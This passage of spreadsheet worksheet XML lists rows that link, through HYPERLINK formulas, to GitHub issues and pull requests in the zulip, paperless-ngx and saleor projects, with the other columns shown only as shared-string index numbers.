        <v>https://github.com/zulip/zulip/pull/30446</v>
      </c>
    </row>
    <row r="319" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A319">
        <v>558</v>
      </c>
      <c r="B319" t="s">
        <v>8</v>
      </c>
      <c r="C319" t="s">
        <v>339</v>
      </c>
      <c r="D319" t="s">
        <v>162</v>
      </c>
      <c r="E319" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/30836", "https://github.com/zulip/zulip/pull/30836")</f>
        <v>https://github.com/zulip/zulip/pull/30836</v>
      </c>
    </row>
    <row r="320" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A320">
        <v>559</v>
      </c>
      <c r="B320" t="s">
        <v>29</v>
      </c>
      <c r="C320" t="s">
        <v>340</v>
      </c>
      <c r="D320" t="s">
        <v>162</v>
      </c>
      <c r="E320" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/issues/31078", "https://github.com/zulip/zulip/issues/31078")</f>
        <v>https://github.com/zulip/zulip/issues/31078</v>
      </c>
    </row>
    <row r="321" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A321">
        <v>560</v>
      </c>
      <c r="B321" t="s">
        <v>11</v>
      </c>
      <c r="C321" t="s">
        <v>341</v>
      </c>
      <c r="D321" t="s">
        <v>162</v>
      </c>
      <c r="E321" t="str">
        <f>HYPERLINK("https://github.com/zulip/zulip/pull/31203", "https://github.com/zulip/zulip/pull/31203")</f>
        <v>https://github.com/zulip/zulip/pull/31203</v>
      </c>
    </row>
    <row r="322" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A322">
        <v>573</v>
      </c>
      <c r="B322" t="s">
        <v>11</v>
      </c>
      <c r="C322" t="s">
        <v>342</v>
      </c>
      <c r="D322" t="s">
        <v>162</v>
      </c>
      <c r="E322" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/1379", "https://github.com/paperless-ngx/paperless-ngx/issues/1379")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/1379</v>
      </c>
      <c r="F322" t="s">
        <v>815</v>
      </c>
      <c r="H322" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="323" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A323">
        <v>574</v>
      </c>
      <c r="B323" t="s">
        <v>65</v>
      </c>
      <c r="C323" t="s">
        <v>343</v>
      </c>
      <c r="D323" t="s">
        <v>162</v>
      </c>
      <c r="E323" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/1379", "https://github.com/paperless-ngx/paperless-ngx/issues/1379")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/1379</v>
      </c>
      <c r="F323" t="s">
        <v>815</v>
      </c>
      <c r="H323" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="324" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A324">
        <v>576</v>
      </c>
      <c r="B324" t="s">
        <v>53</v>
      </c>
      <c r="C324" t="s">
        <v>344</v>
      </c>
      <c r="D324" t="s">
        <v>162</v>
      </c>
      <c r="E324" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/pull/2614", "https://github.com/paperless-ngx/paperless-ngx/pull/2614")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/pull/2614</v>
      </c>
      <c r="F324" s="4" t="s">
        <v>878</v>
      </c>
      <c r="G324" t="s">
        <v>877</v>
      </c>
      <c r="H324" s="5" t="s">
        <v>876</v>
      </c>
    </row>
    <row r="325" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A325">
        <v>577</v>
      </c>
      <c r="B325" t="s">
        <v>311</v>
      </c>
      <c r="C325" t="s">
        <v>345</v>
      </c>
      <c r="D325" t="s">
        <v>162</v>
      </c>
      <c r="E325" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/3234", "https://github.com/paperless-ngx/paperless-ngx/issues/3234")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/3234</v>
      </c>
      <c r="F325" t="s">
        <v>815</v>
      </c>
      <c r="H325" t="s">
        <v>879</v>
      </c>
    </row>
    <row r="326" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A326">
        <v>578</v>
      </c>
      <c r="B326" t="s">
        <v>29</v>
      </c>
      <c r="C326" t="s">
        <v>345</v>
      </c>
      <c r="D326" t="s">
        <v>162</v>
      </c>
      <c r="E326" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/3234", "https://github.com/paperless-ngx/paperless-ngx/issues/3234")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/3234</v>
      </c>
      <c r="F326" t="s">
        <v>815</v>
      </c>
      <c r="H326" t="s">
        <v>879</v>
      </c>
    </row>
    <row r="327" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A327">
        <v>580</v>
      </c>
      <c r="B327" t="s">
        <v>11</v>
      </c>
      <c r="C327" t="s">
        <v>346</v>
      </c>
      <c r="D327" t="s">
        <v>162</v>
      </c>
      <c r="E327" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/3771", "https://github.com/paperless-ngx/paperless-ngx/issues/3771")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/3771</v>
      </c>
      <c r="F327" t="s">
        <v>815</v>
      </c>
      <c r="H327" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="328" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A328">
        <v>581</v>
      </c>
      <c r="B328" t="s">
        <v>65</v>
      </c>
      <c r="C328" t="s">
        <v>347</v>
      </c>
      <c r="D328" t="s">
        <v>162</v>
      </c>
      <c r="E328" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/3771", "https://github.com/paperless-ngx/paperless-ngx/issues/3771")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/3771</v>
      </c>
      <c r="F328" t="s">
        <v>815</v>
      </c>
      <c r="H328" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="329" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A329">
        <v>582</v>
      </c>
      <c r="B329" t="s">
        <v>11</v>
      </c>
      <c r="C329" t="s">
        <v>348</v>
      </c>
      <c r="D329" t="s">
        <v>162</v>
      </c>
      <c r="E329" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/pull/4390", "https://github.com/paperless-ngx/paperless-ngx/pull/4390")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/pull/4390</v>
      </c>
      <c r="F329" t="s">
        <v>840</v>
      </c>
      <c r="G329" t="s">
        <v>880</v>
      </c>
      <c r="H329" s="5" t="s">
        <v>881</v>
      </c>
    </row>
    <row r="330" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A330">
        <v>583</v>
      </c>
      <c r="B330" t="s">
        <v>11</v>
      </c>
      <c r="C330" t="s">
        <v>349</v>
      </c>
      <c r="D330" t="s">
        <v>162</v>
      </c>
      <c r="E330" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/4672", "https://github.com/paperless-ngx/paperless-ngx/issues/4672")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/4672</v>
      </c>
      <c r="F330" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="331" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A331">
        <v>584</v>
      </c>
      <c r="B331" t="s">
        <v>65</v>
      </c>
      <c r="C331" t="s">
        <v>350</v>
      </c>
      <c r="D331" t="s">
        <v>162</v>
      </c>
      <c r="E331" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/4672", "https://github.com/paperless-ngx/paperless-ngx/issues/4672")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/4672</v>
      </c>
      <c r="F331" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="332" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A332">
        <v>588</v>
      </c>
      <c r="B332" t="s">
        <v>11</v>
      </c>
      <c r="C332" t="s">
        <v>351</v>
      </c>
      <c r="D332" t="s">
        <v>162</v>
      </c>
      <c r="E332" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/4712", "https://github.com/paperless-ngx/paperless-ngx/issues/4712")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/4712</v>
      </c>
      <c r="F332" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="333" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A333">
        <v>589</v>
      </c>
      <c r="B333" t="s">
        <v>8</v>
      </c>
      <c r="C333" t="s">
        <v>352</v>
      </c>
      <c r="D333" t="s">
        <v>162</v>
      </c>
      <c r="E333" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/5655", "https://github.com/paperless-ngx/paperless-ngx/issues/5655")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/5655</v>
      </c>
      <c r="F333" t="s">
        <v>815</v>
      </c>
      <c r="H333" t="s">
        <v>882</v>
      </c>
    </row>
    <row r="334" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A334">
        <v>594</v>
      </c>
      <c r="B334" t="s">
        <v>11</v>
      </c>
      <c r="C334" t="s">
        <v>353</v>
      </c>
      <c r="D334" t="s">
        <v>162</v>
      </c>
      <c r="E334" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/5700", "https://github.com/paperless-ngx/paperless-ngx/issues/5700")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/5700</v>
      </c>
      <c r="F334" t="s">
        <v>815</v>
      </c>
      <c r="H334" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="335" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A335">
        <v>595</v>
      </c>
      <c r="B335" t="s">
        <v>65</v>
      </c>
      <c r="C335" t="s">
        <v>354</v>
      </c>
      <c r="D335" t="s">
        <v>162</v>
      </c>
      <c r="E335" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/5700", "https://github.com/paperless-ngx/paperless-ngx/issues/5700")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/5700</v>
      </c>
      <c r="F335" t="s">
        <v>815</v>
      </c>
      <c r="H335" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="336" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A336">
        <v>596</v>
      </c>
      <c r="B336" t="s">
        <v>355</v>
      </c>
      <c r="C336" t="s">
        <v>356</v>
      </c>
      <c r="D336" t="s">
        <v>162</v>
      </c>
      <c r="E336" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/5881", "https://github.com/paperless-ngx/paperless-ngx/issues/5881")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/5881</v>
      </c>
      <c r="F336" t="s">
        <v>815</v>
      </c>
      <c r="H336" t="s">
        <v>883</v>
      </c>
    </row>
    <row r="337" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A337">
        <v>597</v>
      </c>
      <c r="B337" t="s">
        <v>11</v>
      </c>
      <c r="C337" t="s">
        <v>357</v>
      </c>
      <c r="D337" t="s">
        <v>162</v>
      </c>
      <c r="E337" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/6279", "https://github.com/paperless-ngx/paperless-ngx/issues/6279")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/6279</v>
      </c>
      <c r="F337" t="s">
        <v>815</v>
      </c>
      <c r="H337" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="338" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A338">
        <v>598</v>
      </c>
      <c r="B338" t="s">
        <v>65</v>
      </c>
      <c r="C338" t="s">
        <v>358</v>
      </c>
      <c r="D338" t="s">
        <v>162</v>
      </c>
      <c r="E338" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/6279", "https://github.com/paperless-ngx/paperless-ngx/issues/6279")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/6279</v>
      </c>
      <c r="F338" t="s">
        <v>815</v>
      </c>
      <c r="H338" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="339" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A339">
        <v>599</v>
      </c>
      <c r="B339" t="s">
        <v>11</v>
      </c>
      <c r="C339" t="s">
        <v>359</v>
      </c>
      <c r="D339" t="s">
        <v>162</v>
      </c>
      <c r="E339" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/6316", "https://github.com/paperless-ngx/paperless-ngx/issues/6316")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/6316</v>
      </c>
      <c r="F339" t="s">
        <v>815</v>
      </c>
      <c r="H339" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="340" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A340">
        <v>600</v>
      </c>
      <c r="B340" t="s">
        <v>65</v>
      </c>
      <c r="C340" t="s">
        <v>359</v>
      </c>
      <c r="D340" t="s">
        <v>162</v>
      </c>
      <c r="E340" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/6316", "https://github.com/paperless-ngx/paperless-ngx/issues/6316")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/6316</v>
      </c>
      <c r="F340" t="s">
        <v>815</v>
      </c>
      <c r="H340" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="341" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A341">
        <v>601</v>
      </c>
      <c r="B341" t="s">
        <v>11</v>
      </c>
      <c r="C341" t="s">
        <v>360</v>
      </c>
      <c r="D341" t="s">
        <v>162</v>
      </c>
      <c r="E341" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/6349", "https://github.com/paperless-ngx/paperless-ngx/issues/6349")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/6349</v>
      </c>
      <c r="F341" t="s">
        <v>815</v>
      </c>
      <c r="H341" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="342" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A342">
        <v>602</v>
      </c>
      <c r="B342" t="s">
        <v>65</v>
      </c>
      <c r="C342" t="s">
        <v>361</v>
      </c>
      <c r="D342" t="s">
        <v>162</v>
      </c>
      <c r="E342" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/6349", "https://github.com/paperless-ngx/paperless-ngx/issues/6349")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/6349</v>
      </c>
      <c r="F342" t="s">
        <v>815</v>
      </c>
      <c r="H342" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="343" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A343">
        <v>604</v>
      </c>
      <c r="B343" t="s">
        <v>11</v>
      </c>
      <c r="C343" t="s">
        <v>362</v>
      </c>
      <c r="D343" t="s">
        <v>162</v>
      </c>
      <c r="E343" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/6492", "https://github.com/paperless-ngx/paperless-ngx/issues/6492")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/6492</v>
      </c>
      <c r="F343" t="s">
        <v>815</v>
      </c>
      <c r="H343" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="344" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A344">
        <v>605</v>
      </c>
      <c r="B344" t="s">
        <v>65</v>
      </c>
      <c r="C344" t="s">
        <v>363</v>
      </c>
      <c r="D344" t="s">
        <v>162</v>
      </c>
      <c r="E344" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/6492", "https://github.com/paperless-ngx/paperless-ngx/issues/6492")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/6492</v>
      </c>
      <c r="F344" t="s">
        <v>815</v>
      </c>
      <c r="H344" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="345" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A345">
        <v>606</v>
      </c>
      <c r="B345" t="s">
        <v>11</v>
      </c>
      <c r="C345" t="s">
        <v>364</v>
      </c>
      <c r="D345" t="s">
        <v>162</v>
      </c>
      <c r="E345" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/8004", "https://github.com/paperless-ngx/paperless-ngx/issues/8004")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/8004</v>
      </c>
      <c r="F345" t="s">
        <v>815</v>
      </c>
      <c r="H345" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="346" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A346">
        <v>607</v>
      </c>
      <c r="B346" t="s">
        <v>65</v>
      </c>
      <c r="C346" t="s">
        <v>365</v>
      </c>
      <c r="D346" t="s">
        <v>162</v>
      </c>
      <c r="E346" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/8004", "https://github.com/paperless-ngx/paperless-ngx/issues/8004")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/8004</v>
      </c>
      <c r="F346" t="s">
        <v>815</v>
      </c>
      <c r="H346" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="347" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A347">
        <v>608</v>
      </c>
      <c r="B347" t="s">
        <v>11</v>
      </c>
      <c r="C347" t="s">
        <v>366</v>
      </c>
      <c r="D347" t="s">
        <v>162</v>
      </c>
      <c r="E347" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/8828", "https://github.com/paperless-ngx/paperless-ngx/issues/8828")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/8828</v>
      </c>
      <c r="F347" t="s">
        <v>815</v>
      </c>
      <c r="H347" t="s">
        <v>883</v>
      </c>
    </row>
    <row r="348" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A348">
        <v>609</v>
      </c>
      <c r="B348" t="s">
        <v>31</v>
      </c>
      <c r="C348" t="s">
        <v>367</v>
      </c>
      <c r="D348" t="s">
        <v>162</v>
      </c>
      <c r="E348" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/8828", "https://github.com/paperless-ngx/paperless-ngx/issues/8828")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/8828</v>
      </c>
      <c r="F348" t="s">
        <v>815</v>
      </c>
      <c r="H348" t="s">
        <v>883</v>
      </c>
    </row>
    <row r="349" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A349">
        <v>610</v>
      </c>
      <c r="B349" t="s">
        <v>11</v>
      </c>
      <c r="C349" t="s">
        <v>368</v>
      </c>
      <c r="D349" t="s">
        <v>162</v>
      </c>
      <c r="E349" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/9042", "https://github.com/paperless-ngx/paperless-ngx/issues/9042")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/9042</v>
      </c>
      <c r="F349" t="s">
        <v>815</v>
      </c>
      <c r="H349" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="350" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A350">
        <v>611</v>
      </c>
      <c r="B350" t="s">
        <v>65</v>
      </c>
      <c r="C350" t="s">
        <v>369</v>
      </c>
      <c r="D350" t="s">
        <v>162</v>
      </c>
      <c r="E350" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/issues/9042", "https://github.com/paperless-ngx/paperless-ngx/issues/9042")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/issues/9042</v>
      </c>
      <c r="F350" t="s">
        <v>815</v>
      </c>
      <c r="H350" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="351" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A351">
        <v>612</v>
      </c>
      <c r="B351" t="s">
        <v>42</v>
      </c>
      <c r="C351" t="s">
        <v>370</v>
      </c>
      <c r="D351" t="s">
        <v>162</v>
      </c>
      <c r="E351" t="str">
        <f>HYPERLINK("https://github.com/paperless-ngx/paperless-ngx/pull/9542", "https://github.com/paperless-ngx/paperless-ngx/pull/9542")</f>
        <v>https://github.com/paperless-ngx/paperless-ngx/pull/9542</v>
      </c>
      <c r="F351" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="352" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A352">
        <v>613</v>
      </c>
      <c r="B352" t="s">
        <v>11</v>
      </c>
      <c r="C352" t="s">
        <v>371</v>
      </c>
      <c r="D352" t="s">
        <v>162</v>
      </c>
      <c r="E352" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/399", "https://github.com/saleor/saleor/issues/399")</f>
        <v>https://github.com/saleor/saleor/issues/399</v>
      </c>
      <c r="F352" t="s">
        <v>815</v>
      </c>
      <c r="H352" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="353" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A353">
        <v>614</v>
      </c>
      <c r="B353" t="s">
        <v>65</v>
      </c>
      <c r="C353" t="s">
        <v>372</v>
      </c>
      <c r="D353" t="s">
        <v>162</v>
      </c>
      <c r="E353" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/399", "https://github.com/saleor/saleor/issues/399")</f>
        <v>https://github.com/saleor/saleor/issues/399</v>
      </c>
      <c r="F353" t="s">
        <v>815</v>
      </c>
      <c r="H353" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="354" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A354">
        <v>615</v>
      </c>
      <c r="B354" t="s">
        <v>11</v>
      </c>
      <c r="C354" t="s">
        <v>373</v>
      </c>
      <c r="D354" t="s">
        <v>162</v>
      </c>
      <c r="E354" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/423", "https://github.com/saleor/saleor/issues/423")</f>
        <v>https://github.com/saleor/saleor/issues/423</v>
      </c>
      <c r="F354" t="s">
        <v>815</v>
      </c>
      <c r="H354" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="355" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A355">
        <v>616</v>
      </c>
      <c r="B355" t="s">
        <v>65</v>
      </c>
      <c r="C355" t="s">
        <v>374</v>
      </c>
      <c r="D355" t="s">
        <v>162</v>
      </c>
      <c r="E355" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/423", "https://github.com/saleor/saleor/issues/423")</f>
        <v>https://github.com/saleor/saleor/issues/423</v>
      </c>
      <c r="F355" t="s">
        <v>815</v>
      </c>
      <c r="H355" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="356" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A356">
        <v>617</v>
      </c>
      <c r="B356" t="s">
        <v>42</v>
      </c>
      <c r="C356" t="s">
        <v>375</v>
      </c>
      <c r="D356" t="s">
        <v>162</v>
      </c>
      <c r="E356" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/530", "https://github.com/saleor/saleor/pull/530")</f>
        <v>https://github.com/saleor/saleor/pull/530</v>
      </c>
      <c r="F356" s="4" t="s">
        <v>885</v>
      </c>
      <c r="G356" t="s">
        <v>884</v>
      </c>
      <c r="H356" s="5" t="s">
        <v>886</v>
      </c>
    </row>
    <row r="357" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A357">
        <v>620</v>
      </c>
      <c r="B357" t="s">
        <v>11</v>
      </c>
      <c r="C357" t="s">
        <v>376</v>
      </c>
      <c r="D357" t="s">
        <v>162</v>
      </c>
      <c r="E357" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/2310", "https://github.com/saleor/saleor/issues/2310")</f>
        <v>https://github.com/saleor/saleor/issues/2310</v>
      </c>
      <c r="F357" t="s">
        <v>815</v>
      </c>
      <c r="H357" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="358" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A358">
        <v>621</v>
      </c>
      <c r="B358" t="s">
        <v>65</v>
      </c>
      <c r="C358" t="s">
        <v>376</v>
      </c>
      <c r="D358" t="s">
        <v>162</v>
      </c>
      <c r="E358" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/2310", "https://github.com/saleor/saleor/issues/2310")</f>
        <v>https://github.com/saleor/saleor/issues/2310</v>
      </c>
      <c r="F358" t="s">
        <v>815</v>
      </c>
      <c r="H358" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="359" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A359">
        <v>622</v>
      </c>
      <c r="B359" t="s">
        <v>11</v>
      </c>
      <c r="C359" t="s">
        <v>377</v>
      </c>
      <c r="D359" t="s">
        <v>162</v>
      </c>
      <c r="E359" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/2542", "https://github.com/saleor/saleor/issues/2542")</f>
        <v>https://github.com/saleor/saleor/issues/2542</v>
      </c>
      <c r="F359" t="s">
        <v>815</v>
      </c>
      <c r="H359" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="360" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A360">
        <v>623</v>
      </c>
      <c r="B360" t="s">
        <v>65</v>
      </c>
      <c r="C360" t="s">
        <v>377</v>
      </c>
      <c r="D360" t="s">
        <v>162</v>
      </c>
      <c r="E360" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/2542", "https://github.com/saleor/saleor/issues/2542")</f>
        <v>https://github.com/saleor/saleor/issues/2542</v>
      </c>
      <c r="F360" t="s">
        <v>815</v>
      </c>
      <c r="H360" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="361" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A361">
        <v>624</v>
      </c>
      <c r="B361" t="s">
        <v>378</v>
      </c>
      <c r="C361" t="s">
        <v>379</v>
      </c>
      <c r="D361" t="s">
        <v>162</v>
      </c>
      <c r="E361" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/3104", "https://github.com/saleor/saleor/pull/3104")</f>
        <v>https://github.com/saleor/saleor/pull/3104</v>
      </c>
      <c r="F361" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="362" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A362">
        <v>626</v>
      </c>
      <c r="B362" t="s">
        <v>11</v>
      </c>
      <c r="C362" t="s">
        <v>380</v>
      </c>
      <c r="D362" t="s">
        <v>162</v>
      </c>
      <c r="E362" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/4540", "https://github.com/saleor/saleor/issues/4540")</f>
        <v>https://github.com/saleor/saleor/issues/4540</v>
      </c>
      <c r="F362" t="s">
        <v>815</v>
      </c>
      <c r="H362" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="363" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A363">
        <v>627</v>
      </c>
      <c r="B363" t="s">
        <v>65</v>
      </c>
      <c r="C363" t="s">
        <v>380</v>
      </c>
      <c r="D363" t="s">
        <v>162</v>
      </c>
      <c r="E363" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/4540", "https://github.com/saleor/saleor/issues/4540")</f>
        <v>https://github.com/saleor/saleor/issues/4540</v>
      </c>
      <c r="F363" t="s">
        <v>815</v>
      </c>
      <c r="H363" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="364" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A364">
        <v>637</v>
      </c>
      <c r="B364" t="s">
        <v>11</v>
      </c>
      <c r="C364" t="s">
        <v>381</v>
      </c>
      <c r="D364" t="s">
        <v>162</v>
      </c>
      <c r="E364" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/6141", "https://github.com/saleor/saleor/issues/6141")</f>
        <v>https://github.com/saleor/saleor/issues/6141</v>
      </c>
      <c r="F364" t="s">
        <v>815</v>
      </c>
      <c r="H364" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="365" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A365">
        <v>638</v>
      </c>
      <c r="B365" t="s">
        <v>65</v>
      </c>
      <c r="C365" t="s">
        <v>382</v>
      </c>
      <c r="D365" t="s">
        <v>162</v>
      </c>
      <c r="E365" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/6141", "https://github.com/saleor/saleor/issues/6141")</f>
        <v>https://github.com/saleor/saleor/issues/6141</v>
      </c>
      <c r="F365" t="s">
        <v>815</v>
      </c>
      <c r="H365" t="s">
        <v>875</v>
      </c>
    </row>
    <row r="366" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A366">
        <v>642</v>
      </c>
      <c r="B366" t="s">
        <v>383</v>
      </c>
      <c r="C366" t="s">
        <v>384</v>
      </c>
      <c r="D366" t="s">
        <v>162</v>
      </c>
      <c r="E366" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/issues/11742", "https://github.com/saleor/saleor/issues/11742")</f>
        <v>https://github.com/saleor/saleor/issues/11742</v>
      </c>
      <c r="F366" t="s">
        <v>815</v>
      </c>
      <c r="H366" t="s">
        <v>883</v>
      </c>
    </row>
    <row r="367" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A367">
        <v>643</v>
      </c>
      <c r="B367" t="s">
        <v>11</v>
      </c>
      <c r="C367" t="s">
        <v>385</v>
      </c>
      <c r="D367" t="s">
        <v>162</v>
      </c>
      <c r="E367" t="str">
        <f>HYPERLINK("https://github.com/saleor/saleor/pull/11833", "https://github.com/saleor/saleor/pull/11833")</f>
        <v>https://github.com/saleor/saleor/pull/11833</v>
      </c>
      <c r="F367" t="s">
        <v>843</v>
      </c>
      <c r="G367" t="s">
        <v>887</v>
      </c>
